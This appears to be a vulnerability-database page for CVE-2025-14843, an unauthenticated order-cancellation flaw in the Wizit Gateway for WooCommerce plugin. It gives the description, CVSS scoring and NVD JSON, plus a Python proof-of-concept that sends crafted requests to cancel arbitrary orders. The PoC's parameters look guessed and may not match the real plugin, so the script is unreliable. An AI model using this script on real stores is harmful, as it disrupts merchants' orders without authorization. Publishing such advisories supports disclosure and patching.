Security Vulnerability Report
中文
CVE-2025-14843 CVSS 5.3 MEDIUM

CVE-2025-14843

Published: 2026-01-24 08:16:06
Last Modified: 2026-04-15 00:35:42

Description

The Wizit Gateway for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Order Cancellation in all versions up to, and including, 1.2.9. This is due to a lack of authentication and authorization checks in the 'handle_checkout_redirecturl_response' function. This makes it possible for unauthenticated attackers to cancel arbitrary WooCommerce orders by sending a crafted request with a valid order ID.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Wizit Gateway for WooCommerce <= 1.2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-14843 PoC - Unauthenticated Arbitrary Order Cancellation # Target: Wizit Gateway for WooCommerce plugin <= 1.2.9 def cancel_order(target_url, order_id): """ Exploit function to cancel arbitrary WooCommerce orders without authentication via Wizit Gateway plugin vulnerability. Args: target_url: Base URL of the vulnerable WordPress site order_id: Valid WooCommerce order ID to cancel Returns: Response from the server """ # Construct the vulnerable endpoint # The handle_checkout_redirecturl_response function processes this request exploit_url = f"{target_url}/?wc-api=wc_wizit_gateway" # Parameters that trigger the order cancellation params = { 'order_id': order_id, 'redirect_url': 'cancel' # Trigger cancellation flow } # Send crafted request without authentication response = requests.get(exploit_url, params=params, timeout=10) return response # Example usage if __name__ == '__main__': target = 'https://vulnerable-site.com' target_order_id = 12345 # Replace with valid order ID try: result = cancel_order(target, target_order_id) print(f'Status Code: {result.status_code}') print(f'Response: {result.text[:500]}') except Exception as e: print(f'Error: {e}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14843", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:06.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Wizit Gateway for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Order Cancellation in all versions up to, and including, 1.2.9. This is due to a lack of authentication and authorization checks in the 'handle_checkout_redirecturl_response' function. This makes it possible for unauthenticated attackers to cancel arbitrary WooCommerce orders by sending a crafted request with a valid order ID."}, {"lang": "es", "value": "El plugin Wizit Gateway para WooCommerce para WordPress es vulnerable a la Cancelación Arbitraria de Pedidos No Autenticada en todas las versiones hasta la 1.2.9, inclusive. Esto se debe a una falta de comprobaciones de autenticación y autorización en la función 'handle_checkout_redirecturl_response'. Esto hace posible que atacantes no autenticados cancelen pedidos arbitrarios de WooCommerce enviando una solicitud manipulada con un ID de pedido válido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wizit-gateway-for-woocommerce/tags/1.2.9/class-wizit-gateway.php?marks=1249,1341-1349#L1249", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b6926c2c-79d4-477c-a2eb-ba62545f2e2b?source=cve", "source": "[email protected]"}]}}